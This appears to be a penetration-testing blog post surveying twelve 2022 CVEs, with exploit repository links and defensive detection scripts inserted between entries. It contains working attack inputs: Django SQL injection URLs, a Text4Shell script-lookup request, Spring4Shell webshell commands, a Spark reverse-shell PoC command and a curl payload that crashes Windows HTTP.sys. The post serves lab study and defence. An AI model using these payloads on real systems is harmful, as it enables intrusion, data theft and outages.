17 Jan, 2023

CVE TOP 12 in 2022 for penetration testing


What is CVE or Common Vulnerabilities and Exposures?

CVE (Common Vulnerabilities and Exposures) is a publicly available, free-to-use database and glossary of disclosed cyber security issues and their classification. It is maintained by the MITRE Corporation with funding from the U.S. Department of Homeland Security.

Each vulnerability gets a unique identifier, an assessment, and an entry in the MITRE glossary. The purpose is to unify communication between the security and technology industries, which can now refer to one standard.

The glossary uses the Common Vulnerability Scoring System (CVSS) to rate the severity, or threat level, of a vulnerability. Why? We need to understand how much damage a particular security problem can cause and prioritise it accordingly. The assessment depends not only on the technology but also on the business structure of the company.

Top 10 threats detected over the month in Ukraine (source)

 1. Multi.Desert.gen            16.67%
 2. Win32.ShadowBrokers.ae       8.89%
 3. IphoneOS.Vortex.a            7.41%
 4. EMSOffce.CVE-2018-0802.gen   5.19%
 5. AndroidOS.Psneuter.a         4.81%
 6. Win32.Agent.gen              4.81%
 7. AndroidOS.Lotoor.cd          3.70%
 8. AndroidOS.Lotoor.bm          3.70%
 9. Win32.ShadowBrokers.aa       2.96%
10. Java.CVE-2013-1493.x         2.96%

CVE-2022-0847

Severity: High. Privilege escalation in the Linux kernel

The vulnerability allows a local user to escalate privileges on the system. It exists due to the use of uninitialised resources: a local user can overwrite arbitrary files in the page cache, even if the file is read-only, and execute arbitrary code on the system with elevated privileges. The vulnerability was dubbed Dirty Pipe. Linux kernel versions newer than 5.8 are affected.

So far, the vulnerability has been patched in the following Linux kernel versions: 5.16.11, 5.15.25 and 5.10.102.

Exploitation

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git

Usage, exploit-1: an unprivileged user can change the root password to "piped".

For Linux 5.18.0 (which is not vulnerable):

For Linux 5.11.0 (which is vulnerable):

Note! There is also a scanner for CVE-2022-0847. It simply reports whether the Kali kernel version is vulnerable or not:

https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
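The version-only test such a scanner performs can be written from the affected and fixed versions stated above. The following is an added example in Python, not code from the post or from either linked repository; the rules for stable branches the text does not name (5.8 to 5.14 treated as never fixed, 5.17 and later treated as fixed) are assumptions marked in the code. Distribution kernels backport the fix without changing the version number, so a "vulnerable" verdict here is a reason to run the functional checker linked above, not proof.

```python
from __future__ import annotations

import platform
import re

# Fixed point releases named in the text, keyed by stable branch.
FIXED_IN = {(5, 10): (5, 10, 102), (5, 15): (5, 15, 25), (5, 16): (5, 16, 11)}
# The affected code first appeared in the 5.8 series.
FIRST_AFFECTED = (5, 8, 0)


def parse_kernel_release(release: str) -> tuple[int, int, int]:
    """Turn 'uname -r' output such as '5.15.0-56-generic' into (5, 15, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def dirty_pipe_vulnerable(release: str) -> bool:
    """Version-only verdict for CVE-2022-0847.

    True means the mainline version string lies inside the affected range and
    before the fixed release of its branch. Distribution kernels (Debian,
    Ubuntu, RHEL, ...) backport fixes without bumping this number, so True is
    a prompt to run a functional check rather than a confirmed finding.
    """
    v = parse_kernel_release(release)
    if v < FIRST_AFFECTED:
        return False                 # older than 5.8: the code path is absent
    branch = v[:2]
    if branch in FIXED_IN:
        return v < FIXED_IN[branch]  # patched from that point release onward
    if branch > (5, 16):
        return False                 # assumption: 5.17+ were released after the fix
    return True                      # assumption: other 5.8..5.16 branches have no fixed release


def main() -> None:
    release = platform.release()
    verdict = "VULNERABLE (by version)" if dirty_pipe_vulnerable(release) else "not vulnerable (by version)"
    print(f"{release}: {verdict}")


if __name__ == "__main__":
    main()
```

Run it on the host under test; for the two kernels used in the screenshots, 5.11.0 is reported vulnerable and 5.18.0 is not, which matches the results described above.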

Usage, exploit-2: you can inject and overwrite data in the read-only memory of a SUID process that runs as root.

For Linux 5.18.0 (which is not vulnerable):

For Linux 5.11.0 (which is vulnerable):

[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] pooping root shell..
# id
uid=0(root) gid=0(root) groups=0(root),1001(developer)

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847

https://dirtypipe.cm4all.com/

https://www.cybersecurity-help.cz/vdb/SB2022030808

CVE-2022-30190

Severity: Critical. Remote code execution in Microsoft Windows

The vulnerability allows a remote attacker to execute arbitrary shell commands on the target system. It exists due to improper input validation when processing URLs within the Microsoft Windows Support Diagnostic Tool (MSDT). A remote, unauthenticated attacker can trick the victim into downloading (for example from an email) and opening a specially crafted file, which invokes the ms-msdt tool and executes arbitrary OS commands on the target system. Successful exploitation may result in complete compromise of the vulnerable system.
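Because the description boils down to an Office document launching the diagnostic tool, the usual detection is a parent/child process rule rather than a signature for one payload. The following is an added example, not code from the post or from the linked repository, written in Python over a constructed set of process-creation records in the shape Sysmon event ID 1 provides; the field names, the Office process list and the sample command lines are assumptions.

```python
from __future__ import annotations

import csv
import io
from pathlib import PureWindowsPath

# Office applications whose documents should never need the diagnostic tool.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
MSDT = "msdt.exe"

# Constructed process-creation records (ParentImage, Image, CommandLine); not real
# telemetry. Row 2 is a user opening a troubleshooter from Explorer, row 3 is Word
# spawning a print helper, both benign; rows 1, 4 and 5 are what the rule targets.
SAMPLE_EVENTS = """\
ParentImage,Image,CommandLine
C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE,C:\\Windows\\System32\\msdt.exe,"msdt.exe ms-msdt:/constructed-sample"
C:\\Windows\\explorer.exe,C:\\Windows\\System32\\msdt.exe,"msdt.exe -id NetworkDiagnosticsWeb"
C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE,C:\\Windows\\splwow64.exe,"splwow64.exe 12288"
C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE,C:\\Windows\\System32\\msdt.exe,"msdt.exe ms-msdt:/constructed-sample"
C:\\Windows\\System32\\cmd.exe,C:\\Windows\\System32\\msdt.exe,"msdt.exe ms-msdt:/constructed-sample"
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, usable on any host OS."""
    return PureWindowsPath(path).name.lower()


def classify(parent: str, image: str, cmdline: str) -> list[str]:
    """Names of the indicators that fire for one process-creation event."""
    hits = []
    p, i = basename(parent), basename(image)
    if p in OFFICE_PARENTS and i == MSDT:
        hits.append("office-spawned-msdt")          # document handler reached MSDT
    if "ms-msdt:" in cmdline.lower() and p != "explorer.exe":
        hits.append("msdt-protocol-url")            # protocol URL from an unexpected launcher
    return hits


def scan_events(csv_text: str) -> list[tuple[int, list[str]]]:
    """Return (row number, indicators) for every record that triggers a rule."""
    findings = []
    for n, row in enumerate(csv.DictReader(io.StringIO(csv_text)), start=1):
        hits = classify(row["ParentImage"], row["Image"], row["CommandLine"])
        if hits:
            findings.append((n, hits))
    return findings


if __name__ == "__main__":
    for n, hits in scan_events(SAMPLE_EVENTS):
        print(f"row {n}: {', '.join(hits)}")
```

Microsoft's published workaround for CVE-2022-30190 was to disable the ms-msdt URL protocol handler, and the fix shipped in the June 2022 Windows security updates; a behavioural rule like the one above remains useful afterwards because it does not depend on the shape of any one crafted document.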

Exploitation

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/JohnHammond/msdt-follina.git

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190

https://nvd.nist.gov/vuln/detail/CVE-2022-30190

https://www.cybersecurity-help.cz/vdb/SB2022053005

CVE-2022-0482

Severity: Critical. Sensitive data exposure in Easyappointments before 1.4.3

This vulnerability exposes private personal information to an unauthorised actor in the GitHub repository alextselegidis/easyappointments prior to 1.4.3.

Exploitation 

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/Acceis/exploit-CVE-2022-0482  

Usage

The vulnerable website is hosted on localhost and its whole database is dumped, including usernames, passwords and other PII of the users.

Info

https://nvd.nist.gov/vuln/detail/CVE-2022-0482 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0482 

https://packetstormsecurity.com/files/166701/Easy-Appointments-Information-Disclosure.html 

CVE-2022-26134

Severity: Critical. Injection in Atlassian Confluence

Confluence is a collaborative documentation and project management platform for teams; it tracks project status by offering a centralised workspace for members. This CVE is an injection vulnerability in OGNL (Object-Graph Navigation Language), the expression language for Java that Confluence uses, and it allows an unauthenticated attacker to execute arbitrary code. OGNL is used for getting and setting properties of Java objects, among many other things.

Exploitation

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/h3v0x/CVE-2022-26134  

Usage

Atlassian Confluence 7.3.5 is used below as the vulnerable environment. Arbitrary code can be executed by an unauthenticated user.

Info 

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html  

https://nvd.nist.gov/vuln/detail/cve-2022-26134  

CVE-2022-0847 

Severity: High. Privilege escalation in the Linux kernel

A vulnerability in the Linux kernel since 5.8 that allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.

Exploitation

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/arttnba3/CVE-2022-0847

Usage

1. Create a SHA512-crypt hash of your chosen password: openssl passwd -6 --salt THM "PASSWORD"

2. Compile the exploit: gcc poc.c -o exploit

3. Run the exploit to add a root user to the passwd file:
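The PoC above works by writing a new line into /etc/passwd, so the defender's counterpart is a check of that file for the traces such a write leaves: an account with uid 0 that is not root, or a password hash stored inline instead of the shadow marker. The following is an added example in Python, not code from the post or the TryHackMe room; the passwd content is constructed and the hash value is a placeholder.

```python
from __future__ import annotations

import sys

# Constructed /etc/passwd content: three ordinary entries, then the kind of lines
# an exploit that appends a root account leaves behind. Not from a real system;
# the hash after "$6$THM$" is a placeholder, not a real digest.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
developer:x:1001:1001::/home/developer:/bin/bash
rootuser:$6$THM$CONSTRUCTEDHASHVALUE:0:0::/root:/bin/bash
backup:x:0:34:backup:/var/backups:/usr/sbin/nologin
"""

# Values the password field may legitimately hold when /etc/shadow is in use
# or the account is locked.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> list[tuple[int, str]]:
    """Return (line number, reason) for every entry that deserves a look."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((lineno, f"empty password field for {name!r}"))
        elif pw not in SHADOW_MARKERS:
            findings.append((lineno, f"inline password hash for {name!r}"))
        if uid == "0" and name != "root":
            findings.append((lineno, f"uid 0 account {name!r} other than root"))
    return findings


def diff_against_baseline(baseline: str, current: str) -> tuple[list[str], list[str]]:
    """Lines present now but absent from a trusted snapshot, and lines that vanished."""
    before = set(baseline.splitlines())
    after = set(current.splitlines())
    return sorted(after - before), sorted(before - after)


if __name__ == "__main__":
    # Pass a path (normally /etc/passwd) to audit a real file; otherwise use the sample.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for lineno, reason in audit_passwd(text):
        print(f"line {lineno}: {reason}")
```

The baseline comparison is the part worth automating: snapshot /etc/passwd from a known-good image and alert on any added line, since a legitimately provisioned account goes through useradd and the configuration management that calls it, not through a direct write to the file.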

Info 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847  

https://nvd.nist.gov/vuln/detail/CVE-2022-0847  

https://tryhackme.com/room/dirtypipe  

CVE-2022-33891

Severity: High. Apache Spark shell command injection vulnerability

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, it checks whether a user has access permissions to view or modify the application.  If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.

This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
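The description gives two conditions, an affected version and spark.acls.enable set to true, and both can be read from the build version and spark-defaults.conf before anyone reaches for the PoC. The following is an added example in Python, not code from the post or the linked repository; the configuration excerpt is constructed, and because the check only reads spark-defaults.conf, ACLs enabled through --conf on the command line or through SparkConf in application code would be missed.

```python
from __future__ import annotations

import re

NOT_AFFECTED = "not affected"
ACLS_OFF = "affected version, but spark.acls.enable is off (the impersonation path is not reachable)"
EXPOSED = "EXPOSED: affected version with spark.acls.enable=true"

# Inclusive version ranges listed in the advisory text above.
AFFECTED_RANGES = [((0, 0, 0), (3, 0, 3)), ((3, 1, 1), (3, 1, 2)), ((3, 2, 0), (3, 2, 1))]

# Constructed spark-defaults.conf excerpt (not from the PoC repository).
SAMPLE_CONF = """\
# sample configuration for the demo
spark.master              spark://master:7077
spark.ui.port             8080
spark.acls.enable         true
spark.ui.view.acls        analyst
"""


def parse_version(version: str) -> tuple[int, int, int]:
    """'3.2.1', '3.2.1-SNAPSHOT' or '3.2' -> (3, 2, 1) / (3, 2, 0)."""
    nums = [int(x) for x in re.findall(r"\d+", version)[:3]]
    nums += [0] * (3 - len(nums))
    return nums[0], nums[1], nums[2]


def version_affected(version: str) -> bool:
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def parse_spark_conf(text: str) -> dict[str, str]:
    """Key/value pairs from spark-defaults.conf.

    Spark loads the file with Java Properties semantics, so whitespace, '=' and
    ':' all separate key from value and '#' starts a comment (values that
    themselves contain '#' are not handled here).
    """
    conf: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s*[=:]\s*|\s+", line, maxsplit=1)
        conf[parts[0]] = parts[1] if len(parts) > 1 else ""
    return conf


def assess(version: str, conf_text: str) -> str:
    """Combine the version test with the ACL setting into one verdict."""
    if not version_affected(version):
        return NOT_AFFECTED
    conf = parse_spark_conf(conf_text)
    if conf.get("spark.acls.enable", "false").strip().lower() != "true":
        return ACLS_OFF
    return EXPOSED


if __name__ == "__main__":
    print(assess("3.2.1", SAMPLE_CONF))
```

Upgrading to a release outside the listed ranges is the fix; turning spark.acls.enable off only removes the reachable code path and also removes the access control it provided.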

Exploitation 

Clone the repository and follow the instructions for compiling the exploit:

https://github.com/HuskyHacks/cve-2022-33891 

Usage, exploit-1: check whether the server is vulnerable: python3 poc.py -u http://localhost -p 8080 --check --verbose

For a vulnerable target:

For a non-vulnerable target:

Usage, exploit-2: the PoC can also be used to obtain a reverse shell:

python3 poc.py -u http://localhost -p 8080 --revshell -lh <IP> -lp <PORT> --verbose

For vulnerable target:

Info 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33891  

https://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html 

https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc  

CVE-2022-22965 

Severity: Critical. Spring4Shell, Spring Core RCE

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

Exploitation 

Start a vulnerable Docker image of Spring with the command:

docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

This binds the vulnerable Spring application to localhost:8082. Visit http://localhost:8082 to confirm it is up.

Clone the exploit from https://github.com/TheGejr/SpringShell and run the following command to check whether the server is vulnerable:

python3 exp.py --url http://localhost:8082

You can now exploit the vulnerability by visiting the shell address and changing the value of the cmd parameter.

a) For url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami, output of whoami is returned.

b) For url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls 

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965  

https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html  

https://www.oracle.com/security-alerts/cpuapr2022.html  

CVE-2022-42889 

Severity: Critical. Apache Commons Text vulnerability

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers.

These lookups are:

- "script": execute expressions using the JVM script execution engine (javax.script)
- "dns": resolve DNS records
- "url": load values from URLs, including from remote servers

Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Apache Commons Text versions 1.5 to 1.9 are affected.

Exploitation 

Clone the repository and move inside it: https://github.com/akshayithape-devops/CVE-2022-42889-POC

Build the vulnerable application image using Docker:

docker build --tag=test/text4shell .

Create a container from the image and start it:

docker run -it -p 80:8080 --name text4shell test/text4

Open a new terminal tab and run the command below to get a shell inside the web server container:

docker exec -it text4shell /bin/bash

List the files in the directory with ls and note text4shell-poc.jar.

Open another terminal and make a request to the web server. The attack is performed by passing a string of the form "${prefix:name}" where the prefix is one of the lookups listed above: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch newfile.txt')}

For example: the following command should trigger request to make a new file on server:

curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20hello.txt%27%29%7D

Check if the file is created on the server by using ls command again. We can see that file is successfully created. This proves that arbitrary remote code execution is possible.

bash-4.4# ls
text4shell-poc.jar
bash-4.4# ls
hello.txt  text4shell-poc.jar
bash-4.4#
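The Confluence OGNL injection, the Spring4Shell webshell requests and the text4shell curl request above all arrive as HTTP requests, so a single access-log scanner can cover all three. The following is an added example in Python, not code from the post or from any of the linked repositories; the log lines are constructed (line 2 reuses the curl request from this section, line 4 the tomcatwar.jsp request from the Spring4Shell section), the Spring4Shell indicator is the class.* data-binding parameter that Spring's advisory told applications to disallow, and the rules decode the URL only once, so a double-encoded request needs a second decoding pass.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# The three Commons Text lookups the text names as dangerous.
TEXT4SHELL_RE = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)
# Binding parameters that traverse a 'class.' property (Spring4Shell indicator).
CLASS_BINDING_RE = re.compile(r"(^|\.)class\.", re.IGNORECASE)

# Constructed access-log lines (combined log format); not real traffic. Line 1
# carries a harmless OGNL-style expression in the path, line 2 is the curl
# request above, lines 3 and 4 mimic the Spring4Shell steps, line 5 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jun/2022:10:12:01 +0000] "GET /%24%7B7*7%7D/ HTTP/1.1" 302 0
10.0.0.6 - - [18/Oct/2022:09:00:10 +0000] "GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20hello.txt%27%29%7D HTTP/1.1" 200 12
10.0.0.7 - - [31/Mar/2022:14:20:33 +0000] "POST /?class.module.classLoader.foo=bar HTTP/1.1" 200 0
10.0.0.7 - - [31/Mar/2022:14:20:40 +0000] "GET /tomcatwar.jsp?pwd=j&cmd=whoami HTTP/1.1" 200 7
10.0.0.8 - - [18/Oct/2022:09:01:00 +0000] "GET /text4shell/attack?search=hello HTTP/1.1" 200 12
"""


def classify_request(target: str) -> list[str]:
    """Names of every indicator that fires for one request target (path + query)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = unquote(parts.query)
    keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    hits = []
    if "${" in path:                                     # OGNL-style expression in the URI path
        hits.append("expression-in-path")
    if TEXT4SHELL_RE.search(query):                      # ${script:...}, ${dns:...}, ${url:...}
        hits.append("commons-text-lookup")
    if any(CLASS_BINDING_RE.search(k) for k in keys):    # class.* data-binding parameter
        hits.append("spring-classloader-binding")
    if path.lower().endswith(".jsp") and "cmd" in keys:  # a dropped JSP shell being driven
        hits.append("jsp-webshell-command")
    return hits


def scan_access_log(log_text: str) -> list[tuple[int, str, list[str]]]:
    """Return (line number, request target, indicators) for every flagged line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            findings.append((lineno, m.group("target"), hits))
    return findings


if __name__ == "__main__":
    for lineno, target, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}  <- {target[:60]}")
```

The "expression-in-path" rule is deliberately broad: a legitimate application almost never has "${" in a URI path, so the false-positive rate is low while the rule is independent of the exact expression an attacker wraps inside it.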

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42889

https://www.openwall.com/lists/oss-security/2022/10/13/4

https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om

CVE-2022-28346

Severity: Critical. SQL injection vulnerability in Django

A SQL injection vulnerability was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4.

QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed keyword arguments.
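Since Django is Python, the mechanism and the fix pattern can be shown directly. The following is an added example, not code from the post, the PoC repository or Django itself: it renders the field parameter used further down into SQL the way an unvalidated alias lands in the query, applies an alias check modelled on the one the Django security releases introduced (reimplemented here as an assumption of its behaviour; upgrading Django is the real fix), and shows the allowlist pattern a view should use instead of spreading request data into annotate(**kwargs).

```python
from __future__ import annotations

import re

# Character classes a column alias must never contain: quotes, brackets,
# semicolons, whitespace and SQL comment markers. Modelled on the check the
# Django 2.2.28 / 3.2.13 / 4.0.4 releases added; stand-alone reimplementation.
FORBIDDEN_ALIAS_PATTERN = re.compile(r"['`\"\]\[;\s]|--|/\*|\*/")

# The value the PoC sends in the 'field' parameter, URL-decoded.
PAGE_PAYLOAD = 'poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --'


def is_safe_alias(alias: str) -> bool:
    return FORBIDDEN_ALIAS_PATTERN.search(alias) is None


def check_alias(alias: str) -> str:
    """Return the alias unchanged or refuse it, as the patched ORM does."""
    if not is_safe_alias(alias):
        raise ValueError(
            "Column aliases cannot contain whitespace characters, quotation marks, "
            "semicolons, or SQL comments."
        )
    return alias


def render_alias_sql(alias: str) -> str:
    """Simplified picture of how a quoted alias reaches the generated SQL.

    The ORM wraps the alias in double quotes; with an unvalidated alias the
    attacker's value closes the quote and the rest becomes live SQL.
    """
    return f'SELECT "poc_blog"."id", (1) AS "{alias}" FROM "poc_blog"'


# Safe view pattern: map a request parameter to a fixed alias/expression pair.
# Constructed allowlist for the demo; the expression is shown as a string where
# a real view would use django.db.models.F(...).
ALLOWED_ANNOTATIONS = {"title_copy": "title", "author_copy": "author"}


def annotate_kwargs_from_request(requested: str) -> dict[str, str]:
    """Build annotate() keyword arguments without ever trusting the key itself."""
    if requested not in ALLOWED_ANNOTATIONS:
        raise ValueError(f"unknown annotation {requested!r}")
    alias = check_alias(requested)  # belt and braces: the allowlist already guarantees this
    return {alias: f"F({ALLOWED_ANNOTATIONS[requested]!r})"}


if __name__ == "__main__":
    print(render_alias_sql(PAGE_PAYLOAD))       # shows the quote being closed
    print(is_safe_alias(PAGE_PAYLOAD))          # False
    print(annotate_kwargs_from_request("title_copy"))
```

The allowlist is the important half: the alias check stops this particular injection, but a view that lets the client choose ORM keyword arguments is still handing it control over query structure, which is why the request parameter should select from a fixed table rather than be passed through.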

Exploitation

Clone the repository and follow the instructions to start a vulnerable server:

https://github.com/ahsentekdemir/CVE-2022-28346 

Usage, exploit-1: check the version of the SQLite database:

http://127.0.0.1:8000/poc?field=poc.title%22%20FROM%20%22poc_blog%22%20union%20SELECT%20%22-1,%22,sqlite_version(),%223%22%20--

The response shows test-1 3.39.4.

Usage, exploit-2: list all tables of the SQLite database:

http://127.0.0.1:8000/poc?field=poc.title%22%20FROM%20%22poc_blog%22%20union%20SELECT%20%22-1,%22,tbl_name,%223%22%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_name%20NOT%20like%20%27sqlite_%%27%20--

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28346

https://www.djangoproject.com/weblog/2022/apr/11/security-releases 

https://lists.debian.org/debian-lts-announce/2022/04/msg00013.html 

CVE-2022-21907

Severity: Critical. HTTP Protocol Stack remote code execution vulnerability

CVE-2022-21907 (CVSSv3 9.8) is a major flaw affecting the HTTP Protocol Stack (HTTP.sys). HTTP.sys is a kernel device driver present in current Microsoft Windows operating systems that is in charge of HTTP traffic processing in services such as Microsoft IIS.

Due to this vulnerability, an attacker can trigger the infamous “Blue Screen of Death” crash in the underlying machine that runs an unpatched HTTP.sys driver. The disruption this vulnerability can cause is rather severe, and although systems might restart and function properly after one attack, subsequent attacks could lead to a complete denial of service.

Exploitation

To reproduce this exploit, an IIS server should be up (here Windows 10 version 2004, OS build 19041.329, is used) with the server page reachable on localhost.

Once the setup is done, get the IP of the host and run this curl command in a terminal:

curl 192.168.0.164:80 -sH "Accept-encoding: 354429474810858105277502,753225473272192695969091599085146218998458873428858279498120&68&**82302744837636557755**9,2120453047251623940869443373783750655190662992171177571578371548748405709,03504570598828001819032433815484769110241925758402724193417475718971298,895259892660286842061499776,****************************267816, *, ,"

Once the command is executed, observe that the host goes down with a Blue Screen of Death crash.

This PoC can also be reproduced with the Git repo: https://github.com/ZZ-SOCMAP/CVE-2022-21907

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907

https://nvd.nist.gov/vuln/detail/CVE-2022-21907

https://github.com/ZZ-SOCMAP/CVE-2022-21907

CVE-2022-21999

Severity: High. Windows Print Spooler elevation of privilege vulnerability (LPE)

The vulnerability (CVE-2022-21999), which has a CVSS score of 7.8 (High), gives the attacker elevated rights if exploited successfully. A normal user runs the vulnerable exe and executes a shell command that elevates the role by creating an admin account on the host.

Exploitation

To replicate this vulnerability, a normal user account on the host is required; that user can then elevate privileges by executing the vulnerable exe to create an admin account with the default password "Passw0rd!".

This PoC can also be reproduced with the Git repo: https://github.com/ly4k/SpoolFool

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999

https://nvd.nist.gov/vuln/detail/CVE-2022-21999

https://github.com/ly4k/SpoolFool

CVE-2022-1388

Severity: Critical. F5 BIG-IP iControl REST vulnerability, RCE exploit with Java

Undisclosed requests may bypass iControl REST authentication. This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.

Exploitation

To replicate this vulnerability, a Git repo on the host can be used to determine whether or not the host is vulnerable. In this case a vulnerable host with the BIG-IP service running is used to identify the vulnerability.

To demonstrate the impact, an arbitrary command is submitted and the server returns the expected result without any authentication.

This PoC can also be reproduced with the Git repo: https://github.com/Zeyad-Azima/CVE-2022-1388

Info

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

https://nvd.nist.gov/vuln/detail/CVE-2022-1388

https://github.com/Zeyad-Azima/CVE-2022-1388

Thanks for reading!
